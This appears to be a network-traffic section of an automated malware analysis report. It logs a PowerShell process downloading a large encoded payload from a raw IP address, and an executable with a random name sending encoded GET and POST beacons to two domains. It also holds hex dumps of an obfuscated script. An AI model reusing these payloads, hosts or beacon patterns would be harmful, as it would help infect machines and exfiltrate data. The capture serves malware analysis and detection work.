                                                                                                      Dec 4, 2024 13:08:20.148988008 CET1236INData Raw: 00 41 00 66 00 57 00 57 00 69 00 22 00 0d 00 0a 00 55 00 7a 00 7a 00 78 00 42 00 54 00 70 00 43 00 69 00 68 00 78 00 55 00 55 00 4c 00 4c 00 20 00 3d 00 20 00 22 00 72 00 6f 00 50 00 41 00 6e 00 4b 00 67 00 4a 00 55 00 55 00 62 00 62 00 6b 00 50
                                                                                                      Data Ascii: AfWWi"UzzxBTpCihxUULL = "roPAnKgJUUbbkPZ"CZoxhLLKLWWeWdW = "NNQatNLLaLxGRBo"ztddcWHkWicWzdt = "bkbULOtPTUWPLbG"
                                                                                                      Dec 4, 2024 13:08:20.149004936 CET1236INData Raw: 00 50 00 20 00 3d 00 20 00 22 00 57 00 62 00 4c 00 4a 00 52 00 71 00 72 00 57 00 47 00 66 00 4b 00 67 00 63 00 6b 00 55 00 22 00 0d 00 0a 00 4e 00 4a 00 4b 00 50 00 6b 00 50 00 55 00 4e 00 71 00 78 00 47 00 4c 00 43 00 4b 00 55 00 20 00 3d 00 20
                                                                                                      Data Ascii: P = "WbLJRqrWGfKgckU"NJKPkPUNqxGLCKU = "TUbpLlGLfbLtGcA"sgWZLqLAxcnuLxL = "KGziecnGWksGKfW"BvzpaudppilGWGL = "RWpUK
                                                                                                      Dec 4, 2024 13:08:20.150113106 CET1236INData Raw: 00 0a 00 76 00 57 00 70 00 6b 00 6c 00 50 00 75 00 69 00 4e 00 51 00 57 00 53 00 4e 00 68 00 55 00 20 00 3d 00 20 00 22 00 66 00 4c 00 62 00 69 00 48 00 62 00 6f 00 63 00 55 00 74 00 7a 00 55 00 4c 00 68 00 71 00 22 00 0d 00 0a 00 64 00 57 00 57
                                                                                                      Data Ascii: vWpklPuiNQWSNhU = "fLbiHbocUtzULhq"dWWLsiNUiRmhihK = "KzLGLpZzWiPLaAe"HCneBUWffcZeAPk = "WjzAcZhWAiSKGAx"tlLAiPiat
                                                                                                      Dec 4, 2024 13:08:20.150132895 CET1236INData Raw: 00 6e 00 4c 00 4c 00 62 00 41 00 66 00 7a 00 4a 00 52 00 4c 00 66 00 22 00 0d 00 0a 00 6c 00 51 00 41 00 42 00 41 00 47 00 57 00 57 00 57 00 4e 00 62 00 47 00 61 00 4f 00 69 00 20 00 3d 00 20 00 22 00 62 00 4c 00 63 00 43 00 71 00 6a 00 6d 00 75
                                                                                                      Data Ascii: nLLbAfzJRLf"lQABAGWWWNbGaOi = "bLcCqjmubKkZcWW"nLdhGRNlaehzZPc = "kpupfxqadLPLjTp"WJbmIRRcKWLbuHG = "xhNPCfqQIfPc
                                                                                                      Dec 4, 2024 13:08:20.151226997 CET1236INData Raw: 00 65 00 68 00 6d 00 42 00 65 00 6d 00 6c 00 20 00 3d 00 20 00 22 00 4c 00 69 00 69 00 69 00 72 00 4b 00 67 00 63 00 6d 00 65 00 55 00 6f 00 6f 00 7a 00 6b 00 22 00 0d 00 0a 00 48 00 65 00 67 00 4c 00 65 00 66 00 7a 00 57 00 57 00 63 00 68 00 49
                                                                                                      Data Ascii: ehmBeml = "LiiirKgcmeUoozk"HegLefzWWchIRGG = "cRojWKCbhGjvCdh"fWxGkWgpZPcLLpk = "fWiWilPckkLLUWB"LpzimBBLGeWhsIf =
                                                                                                      Dec 4, 2024 13:08:20.151247025 CET1236INData Raw: 00 6b 00 6d 00 76 00 65 00 22 00 0d 00 0a 00 6c 00 68 00 4b 00 42 00 70 00 69 00 63 00 55 00 73 00 66 00 70 00 55 00 68 00 70 00 69 00 20 00 3d 00 20 00 22 00 62 00 6d 00 4b 00 6b 00 7a 00 51 00 57 00 57 00 47 00 4b 00 50 00 63 00 6b 00 4b 00 57
                                                                                                      Data Ascii: kmve"lhKBpicUsfpUhpi = "bmKkzQWWGKPckKW"NbnGoqGUmPxLprd = "GPoWOgqWjWuLbib"KcBLGdWheUtpbac = "WSuLtiLkBonnKpo"KPz
                                                                                                      Dec 4, 2024 13:08:20.152266979 CET1236INData Raw: 00 20 00 22 00 68 00 65 00 69 00 57 00 4e 00 63 00 65 00 42 00 55 00 68 00 42 00 54 00 41 00 57 00 64 00 22 00 0d 00 0a 00 70 00 7a 00 6c 00 5a 00 57 00 4c 00 52 00 57 00 75 00 63 00 66 00 54 00 52 00 57 00 52 00 20 00 3d 00 20 00 22 00 57 00 70
                                                                                                      Data Ascii: "heiWNceBUhBTAWd"pzlZWLRWucfTRWR = "WpWcstLJfxCRcTt"thSnGfpezUmBSZa = "nvqZUGLGLscKKdc"uzGpepWKPAJkqdW = "xfKOkt
                                                                                                      Dec 4, 2024 13:08:20.268043041 CET1236INData Raw: 00 6c 00 47 00 6c 00 6f 00 4a 00 7a 00 65 00 43 00 57 00 53 00 63 00 65 00 47 00 20 00 3d 00 20 00 22 00 4c 00 4c 00 4b 00 74 00 41 00 76 00 61 00 68 00 48 00 57 00 75 00 6d 00 63 00 55 00 6f 00 22 00 0d 00 0a 00 4b 00 4c 00 57 00 65 00 6d 00 72
                                                                                                      Data Ascii: lGloJzeCWSceG = "LLKtAvahHWumcUo"KLWemrzWzWNshao = "WPzpcNKLQLPboia"xWLBUxkTAdGWczW = "RWocALhhkGhWorn"ZTGuUGSLciWH


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.849709107.172.44.175806364C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 4, 2024 13:08:44.577931881 CET77OUTGET /244/RFGDF.txt HTTP/1.1
                                                                                                      Host: 107.172.44.175
                                                                                                      Connection: Keep-Alive
                                                                                                      Dec 4, 2024 13:08:45.731849909 CET1236INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 04 Dec 2024 12:08:44 GMT
                                                                                                      Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                                                      Last-Modified: Wed, 04 Dec 2024 06:37:02 GMT
                                                                                                      ETag: "5e2ac-6286c026f0aa9"
                                                                                                      Accept-Ranges: bytes
                                                                                                      Content-Length: 385708
                                                                                                      Keep-Alive: timeout=5, max=100
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: text/plain
                                                                                                      Data Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                                      Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgN66lRYrgnezHE0Cd/lXL0G/egCjWPCSEX6WrSzyaGKl2ga7foPTAdwpFt52QS2zdCKvTAn
                                                                                                      Dec 4, 2024 13:08:45.732044935 CET224INData Raw: 63 32 4e 2f 32 6c 4c 49 65 6d 4f 36 2f 54 54 34 65 6f 57 73 6e 62 4a 57 48 53 53 75 31 49 70 4a 76 6f 4b 6e 67 5a 58 4f 47 77 48 73 43 2f 6c 78 2b 6e 2f 49 54 4e 56 48 2f 4d 6a 67 65 53 66 49 44 78 61 35 42 4b 4e 79 37 30 4f 68 62 71 52 7a 32 56
                                                                                                      Data Ascii: c2N/2lLIemO6/TT4eoWsnbJWHSSu1IpJvoKngZXOGwHsC/lx+n/ITNVH/MjgeSfIDxa5BKNy70OhbqRz2Vp2wpwF174g4AB0kCJudpcEpd3bKTe016OqkptevzMgDm3k9CoKq76Qx4vhxUUqSz1kaDndvUpd8gDoOVpvasaAUGlh8Z3WEaxJpgVGJorYiM8cAR6o8TXETyxrhnHrSiZpqJmeCLwizZKf
                                                                                                      Dec 4, 2024 13:08:45.732058048 CET1236INData Raw: 70 6f 49 62 70 71 32 70 4c 2b 71 69 4e 4a 73 42 33 54 49 48 33 35 2f 63 53 5a 45 61 5a 7a 37 51 35 6c 67 4c 32 53 68 6d 33 63 4d 6a 41 78 42 58 33 67 31 68 56 4a 4f 7a 57 51 34 35 41 42 67 41 63 7a 39 43 78 64 72 64 61 44 2b 2f 49 4f 32 43 72 79
                                                                                                      Data Ascii: poIbpq2pL+qiNJsB3TIH35/cSZEaZz7Q5lgL2Shm3cMjAxBX3g1hVJOzWQ45ABgAcz9CxdrdaD+/IO2Crydd8eGlOJDUHR9igCHEpdMv+PTWzuG7Fj4Rbv4NsmDsqcaVLF/aO6aN1GTOhvzXrJ0Ry1XOUvCHIPAI52aTiNj97g8ptKzEC/Bg3ijk10vJuzxH3Ghhee9sFkeFYelkJuTKTRHbulZkEoYD5Aqd2X38IKcV7cgbEEH
                                                                                                      Dec 4, 2024 13:08:45.732505083 CET1236INData Raw: 51 7a 68 4e 51 4e 59 6d 50 58 66 6f 65 38 52 48 49 48 50 42 36 46 4f 68 2f 47 75 35 34 63 45 38 57 54 6f 4a 5a 61 61 52 42 41 67 4e 33 34 6d 4a 45 59 54 2f 62 6d 46 6f 4b 78 30 47 34 74 42 35 5a 75 41 4f 6a 5a 72 54 6b 58 6a 31 47 63 63 33 69 30
                                                                                                      Data Ascii: QzhNQNYmPXfoe8RHIHPB6FOh/Gu54cE8WToJZaaRBAgN34mJEYT/bmFoKx0G4tB5ZuAOjZrTkXj1Gcc3i04IJ5RAPYQKmDfhwDHQfsHkd7Uq4CS+PLByOsaLBsBtia1kPSiBhnnn6WhDIl6i27j9/htUKj6opGHZWv/4kt1jhPmGLIuStRO850bQh2lXXvjo0XyH94ch6C6l5HLuM+GHC1vDLnWXE3Gb1O9O6qX9HvufT4xS69a
                                                                                                      Dec 4, 2024 13:08:45.732517958 CET1236INData Raw: 6e 52 73 6e 53 72 47 57 76 55 6d 30 2f 39 58 72 52 38 57 78 77 33 75 54 34 71 4e 66 4d 78 47 51 46 49 30 79 65 62 30 31 5a 72 53 59 53 6d 78 79 4d 64 46 63 45 55 7a 35 33 37 35 4f 4a 6a 71 38 4a 76 4b 34 62 6e 4b 42 6d 75 70 2f 56 71 2f 66 47 51
                                                                                                      Data Ascii: nRsnSrGWvUm0/9XrR8Wxw3uT4qNfMxGQFI0yeb01ZrSYSmxyMdFcEUz5375OJjq8JvK4bnKBmup/Vq/fGQsaWPttGXXHGAk8vIJ25R0HUpQEcYRBSAeCJ5kEAhE6Uhg57fZE9YvIQ8gVkbl6q6rkApp/rWIw8k/QuzvpfaPPdvGtp4D4JWobEVNjy488MS8X6Ec9iKAlqu8luEQKnJk+U39XI8oT4M6iIFH6MRh/MCLYTqchkLr
                                                                                                      Dec 4, 2024 13:08:45.733340025 CET1236INData Raw: 76 36 4e 78 43 34 4f 59 72 48 33 68 47 51 76 4f 5a 69 6f 32 2b 46 43 4d 78 49 5a 54 46 6a 50 51 35 69 38 4d 47 4c 59 57 31 72 65 46 7a 4d 6a 74 4c 4c 47 50 61 50 6d 73 64 55 72 6e 38 50 49 4b 67 6d 43 76 66 39 45 53 55 6e 47 68 53 33 50 53 66 39
                                                                                                      Data Ascii: v6NxC4OYrH3hGQvOZio2+FCMxIZTFjPQ5i8MGLYW1reFzMjtLLGPaPmsdUrn8PIKgmCvf9ESUnGhS3PSf9KuulMpzhlKExsFDBl8HJAKX+gAIyCcnaolCOv1JR4YGRQlelJN4Py4tdiqnLXPdxLo+XKNoAOGltF3X9FHFarr/39AWtS6yG7ubYx8/DXWORCCZZAMREh0Ed0w/0AMfFpp6w94F9z24duaSRMaZE6vzogCySeLjrw
                                                                                                      Dec 4, 2024 13:08:45.733352900 CET1236INData Raw: 78 38 65 30 6c 6b 52 42 77 4a 39 37 4f 58 69 4a 54 44 44 44 38 39 49 75 4c 30 37 68 6a 71 30 30 78 4e 30 70 34 5a 46 79 6f 59 38 58 69 4b 45 4b 50 53 6d 6e 47 47 62 78 35 66 53 62 30 71 39 6b 63 69 59 6f 67 55 51 72 66 39 77 47 7a 34 59 43 75 36
                                                                                                      Data Ascii: x8e0lkRBwJ97OXiJTDDD89IuL07hjq00xN0p4ZFyoY8XiKEKPSmnGGbx5fSb0q9kciYogUQrf9wGz4YCu6qiIwWW30x1MiGFauQ08VBEk4Gda2rsA+5hqnYHVsz8brOhB9Gn+ifC0AyM3/2ioiduTnjMxYieFYT3P5jLh5HOLx4VbfZf8tXsLKTTylLeO71hvhJla3/4ruIMSrlJFE9YNfTrT1P3bYk+hyoaedjlplWCSwnyfLJ
                                                                                                      Dec 4, 2024 13:08:45.734185934 CET1236INData Raw: 45 65 67 68 31 35 77 64 54 32 4b 4e 6d 48 68 6e 32 59 5a 51 51 47 70 37 76 36 2f 4d 49 67 71 41 66 4e 56 68 74 42 5a 6a 41 72 79 64 67 74 69 5a 34 45 46 2f 79 45 78 77 6a 2f 61 6f 46 74 65 35 4e 33 76 4e 56 38 47 31 73 72 53 70 59 71 69 58 53 33
                                                                                                      Data Ascii: Eegh15wdT2KNmHhn2YZQQGp7v6/MIgqAfNVhtBZjArydgtiZ4EF/yExwj/aoFte5N3vNV8G1srSpYqiXS3yvmgFV+rQxckl7fCqEGOOKuOyVt599G6zEfxfPLFE1L3v32VCkUbQiRIg9kjEzdlKpLh9dPTPPORkx+ZNp7naLoepQ0p/rp8nfYh2/DG1yIfe1MdVAmMm0Amfk0KmJzLG2I5XJmWhuet3blXOtGQOfSTNm5+ClKLY
                                                                                                      Dec 4, 2024 13:08:45.734199047 CET1236INData Raw: 44 48 72 33 4c 57 38 46 6d 77 6a 45 7a 4a 4a 47 64 4a 6d 34 42 36 72 51 34 36 41 48 4e 39 69 75 71 76 54 72 6b 66 52 48 2f 77 52 6d 64 4b 39 62 6f 67 66 4b 66 4c 5a 44 66 36 58 2b 59 4a 70 6c 66 78 71 71 52 72 66 6e 76 63 50 64 50 32 5a 73 43 56
                                                                                                      Data Ascii: DHr3LW8FmwjEzJJGdJm4B6rQ46AHN9iuqvTrkfRH/wRmdK9bogfKfLZDf6X+YJplfxqqRrfnvcPdP2ZsCVJMM2H837cpakfQdauT8OWe2KwYG6TwVgPUZ2lJBQyw7uFH/u2joEqv7A05YnUWpamtswsdPyr44GgoNhnwfXT+QgictiNLgbDqf5gBaNDJiOQDYUdgNtT7L957CNb+4c/GqgYuQ6RXtWM0jzk4VBH+7sVA9daZJ52
                                                                                                      Dec 4, 2024 13:08:45.734947920 CET1236INData Raw: 46 37 69 7a 6b 74 73 54 39 61 78 31 67 54 51 69 6d 44 54 4f 6b 63 51 73 32 50 34 45 62 47 6c 33 36 76 69 79 4c 44 72 69 6c 64 55 77 66 48 70 72 48 57 41 76 79 69 4c 35 59 77 32 4f 79 42 77 74 48 4d 33 74 58 6a 56 54 37 61 36 69 42 36 59 4e 32 57
                                                                                                      Data Ascii: F7izktsT9ax1gTQimDTOkcQs2P4EbGl36viyLDrildUwfHprHWAvyiL5Yw2OyBwtHM3tXjVT7a6iB6YN2Wlhvb/b9FZ+monubemS5zzIBT4Nl4LZXfeRPvBEDOXGsGA56m2n8oPBkQvjYxKAfNl03BX0ep3sDv5bvK2MX3w32Aw0fNsmPwM6Mf+DCj9+g23KJkRSOTqDx4Ay9hWB4WWHiLQV13jW+ptybBNVT5sxA7srLsAunzn
                                                                                                      Dec 4, 2024 13:08:45.851938963 CET1236INData Raw: 33 69 44 30 46 76 38 67 74 51 42 2b 71 6b 30 45 63 59 52 53 74 48 54 49 38 31 55 56 63 61 53 6c 74 77 4a 6f 46 45 51 49 6f 4b 37 67 76 37 4a 6b 37 6c 6b 7a 68 7a 6d 32 30 7a 79 31 52 49 72 39 4c 6d 48 79 34 6c 59 46 7a 65 48 72 59 4d 4d 41 4a 73
                                                                                                      Data Ascii: 3iD0Fv8gtQB+qk0EcYRStHTI81UVcaSltwJoFEQIoK7gv7Jk7lkzhzm20zy1RIr9LmHy4lYFzeHrYMMAJsROTVYEokBb0yspIY0gKfs2M6T0uMqJPVb6nzplTpxT0Io+L38MHzkqK02byDo42++3x148xMpq9rOWQ+p2IMrLgNqwJwkukUWfaNFjM28wVQAYBUtllAmIyCzNZGPZmCsHXBVj35MlA4YcvL7jDDROQVd+xyBBC8X


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.849723172.67.150.2118060C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 4, 2024 13:09:36.642601967 CET495OUTGET /r72u/?-DiH=2XvD5&CJE8V=GItYwatNh5Xk+Q2MTg9ApsiGHoFk1E90IzupkRdOfJqts8zyaMFRFG2wZpK3L9f87JrBtQZPR7+NA6TbtORZfIe2HAOWLNTCJkmVcfUZGPKfL9xE/oouBrRom1yDfEIfZg== HTTP/1.1
                                                                                                      Host: www.enoughmoney.online
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Connection: close
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                                                                                                      Dec 4, 2024 13:09:38.120176077 CET1008INHTTP/1.1 404 Not Found
                                                                                                      Date: Wed, 04 Dec 2024 12:09:37 GMT
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=742%2BUAINZjpdBsEaKOwC38Krv1ju7ChPcM%2FbqPxqYltx0Pl2MPNqZnPUS7JTm13qVyagMZorfFpJXpP4Y3FzWAvTeSKPHrDtvjEBMTzzTYcmZQxxX6QhwSES2LGX30oY%2FR7SjZuNKL3B"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8ecbb049f9b38c7d-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1978&min_rtt=1978&rtt_var=989&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=495&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Data Raw: 63 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 72 37 32 75 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                      Data Ascii: cb<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /r72u/ was not found on this server.</p></body></html>0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.849764172.67.128.1098060C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 4, 2024 13:09:53.653451920 CET751OUTPOST /wl1d/ HTTP/1.1
                                                                                                      Host: www.cifasnc.info
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 206
                                                                                                      Origin: http://www.cifasnc.info
                                                                                                      Referer: http://www.cifasnc.info/wl1d/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
                                                                                                      Data Raw: 43 4a 45 38 56 3d 61 74 38 33 45 56 77 42 6b 73 48 46 50 34 38 4a 77 49 48 51 6d 4e 34 53 33 32 77 71 4c 38 69 33 62 65 68 2f 35 56 66 70 74 6d 2b 63 71 73 7a 55 41 53 52 51 38 51 57 50 55 30 6b 52 50 59 45 39 51 2f 68 2f 54 39 7a 69 7a 58 75 41 45 6e 6d 77 74 6c 44 4e 63 4e 62 4b 78 51 6a 70 70 45 6c 49 55 42 44 69 71 4e 6a 52 69 48 72 47 76 6c 66 51 35 36 78 6f 6b 2b 37 6b 47 35 6a 71 55 32 2f 4e 35 36 77 50 6b 43 4b 57 65 76 4b 5a 68 46 51 59 4f 69 59 66 6c 57 31 4b 72 69 39 31 74 33 37 54 72 6e 75 2f 39 7a 6c 4f 36 70 34 46 75 31 33 50 4d 49 32 63 4d 69 62 63 34 4e 42 65 44 64 71 6b 71 6d 4f 34 58 4c 4d 3d
                                                                                                      Data Ascii: CJE8V=at83EVwBksHFP48JwIHQmN4S32wqL8i3beh/5Vfptm+cqszUASRQ8QWPU0kRPYE9Q/h/T9zizXuAEnmwtlDNcNbKxQjppElIUBDiqNjRiHrGvlfQ56xok+7kG5jqU2/N56wPkCKWevKZhFQYOiYflW1Kri91t37Trnu/9zlO6p4Fu13PMI2cMibc4NBeDdqkqmO4XLM=
                                                                                                      Dec 4, 2024 13:09:54.892039061 CET1236INHTTP/1.1 404 Not Found
                                                                                                      Date: Wed, 04 Dec 2024 12:09:54 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      x-pingback: http://cifasnc.info/xmlrpc.php
                                                                                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                      last-modified: Wed, 04 Dec 2024 12:09:54 GMT
                                                                                                      cache-control: no-cache, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      vary: Accept-Encoding,User-Agent
                                                                                                      x-turbo-charged-by: LiteSpeed
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SDegcyNPwz2ldTWYw8mBg1LChIHHwPUCoxwu31J22yKj59akTIGXZzJAbUOEER41dCLBaPAsqHwN2YHAv3j7qqgMeNbYAfPO%2FChkf3QAMvsve9TtxSen7N0nbwyqrBbtNwRv"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8ecbb0b4486ec342-EWR
                                                                                                      Content-Encoding: gzip
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1526&min_rtt=1526&rtt_var=763&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=751&delivery_rate=0&cwnd=158&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                      Data Raw: 35 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 57 5f 6f dc 36 0c 7f ce 01 f9 0e ac 0a e4 5a 6c 3e 27 6d b7 15 ad ed a1 4b 1b ac 0f eb 82 a6 c5 b0 a7 41 67 d3 b6 16 59 52 24 f9 2e 07 ec c3 0f 92 fc f7 7a 4b ee 61 79 38 4b 24 c5 1f 49 91 14 93 3c 79 ff fb e5 97 3f af 3f 40 6d 1b 9e 2d 12 f7 81 82 e9 94 70 ab 09 70 2a aa 94 a0 88 be de 10 c7 45 5a 64 8b a4 41 4b 21 af a9 36 68 53 f2 f5 cb 55 f4 9a 40 9c 2d 12 cb 2c c7 ec 9a 56 08 42 5a 28 65 2b 0a f8 07 72 56 52 23 f2 15 13 a5 4c e2 20 b4 48 38 13 b7 a0
                                                                                                      Data Ascii: 51eW_o6Zl>'mKAgYR$.zKay8K$I<y??@m-pp*EZdAK!6hSU@-,VBZ(e+rVR#L H8
                                                                                                      Dec 4, 2024 13:09:54.892244101 CET1153INData Raw: 91 a7 44 69 59 32 8e 04 6a 8d 65 4a 6a 6b d5 9b 38 ae 1a 55 ad a4 ae e2 fb 52 c4 17 17 01 61 3c 64 ec 8e a3 a9 11 2d 01 bb 53 98 12 8b f7 36 ce 8d 21 d0 60 c1 68 4a 28 e7 7b 3a a7 96 c4 5b 15 e5 52 58 14 36 b6 35 36 68 e2 5b 54 68 63 af 79 e5 15
                                                                                                      Data Ascii: DiY2jeJjk8URa<d-S6!`hJ({:[RX656h[Thcy!)oVJj4{{R2)bmw'N8oxD,R6k;|(a3o)q|PJ40L&rhVXuDT2 ,!,m0%JM


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.849771172.67.128.1098060C:\Program Files (x86)\jUNEQWDieJNjpKeEnQjcaTVCbRoYdKlVACJfKLmyhnZTcujySKMhMUlEDsxRiIVRgTYWoZbCH\HDLzkMKGEKBh.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 4, 2024 13:09:56.318219900 CET771OUTPOST /wl1d/ HTTP/1.1
                                                                                                      Host: www.cifasnc.info
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=0
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      Content-Length: 226
                                                                                                      Origin: http://www.cifasnc.info
                                                                                                      Referer: http://www.cifasnc.info/wl1d/
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36 OPR/31.0.1889.174
